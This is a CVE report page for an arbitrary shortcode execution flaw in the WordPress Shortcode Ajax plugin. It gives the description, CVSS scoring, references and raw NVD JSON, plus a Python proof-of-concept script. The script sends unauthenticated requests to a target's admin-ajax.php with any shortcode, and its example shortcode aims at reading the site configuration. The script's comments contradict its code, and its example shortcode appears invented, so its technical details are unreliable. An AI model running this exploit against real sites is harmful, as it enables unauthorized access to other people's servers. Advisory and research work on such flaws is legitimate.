Security Vulnerability Report
CVE-2025-14539 CVSS 5.4 MEDIUM

CVE-2025-14539

Published: 2025-12-13 16:16:51
Last Modified: 2026-04-15 00:35:42

Description

The Shortcode Ajax plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Weakness: CWE-94 (Improper Control of Generation of Code)

Configurations (Affected Products)

No CPE configuration data available (vulnerability status: Deferred).

Affected product: WordPress Shortcode Ajax plugin <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-14539 PoC - WordPress Shortcode Ajax Plugin Arbitrary Shortcode Execution
# Author: Security Researcher
# Target: WordPress site with Shortcode Ajax plugin <= 1.0

import requests
import sys


def exploit_shortcode_ajax(target_url, shortcode):
    """
    Exploit arbitrary shortcode execution via the vulnerable ajax endpoint
    """
    # Determine the admin-ajax.php endpoint
    if target_url.endswith('/'):
        ajax_url = target_url + 'wp-admin/admin-ajax.php'
    else:
        ajax_url = target_url + '/wp-admin/admin-ajax.php'

    # Construct the exploit payload
    # The vulnerable parameter is 'action' which accepts shortcode commands
    params = {
        'action': 'shortcode_ajax',  # Plugin's ajax action
        'shortcode': shortcode       # Arbitrary shortcode to execute
    }

    try:
        print(f'[*] Sending exploit request to: {ajax_url}')
        print(f'[*] Shortcode payload: {shortcode}')
        # Send the request (no authentication required)
        response = requests.get(ajax_url, params=params, timeout=10)
        print(f'[+] Response Status: {response.status_code}')
        print('[+] Response Content:')
        print(response.text)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return None


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python cve-2025-14539.py <target_url> <shortcode>')
        print('Example: python cve-2025-14539.py http://target.com "[wp_config_read]"')
        sys.exit(1)
    target = sys.argv[1]
    shortcode_cmd = sys.argv[2]
    exploit_shortcode_ajax(target, shortcode_cmd)
```

References

- https://plugins.trac.wordpress.org/browser/shortcode-ajax/trunk/shortcode-ajax.php#L29 (plugin source, vulnerable line)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8e2a994f-7a42-4ccb-8fa0-77107ba1150c?source=cve (Wordfence advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14539",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-13T16:16:51.107",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The The Shortcode Ajax plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/shortcode-ajax/trunk/shortcode-ajax.php#L29",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8e2a994f-7a42-4ccb-8fa0-77107ba1150c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```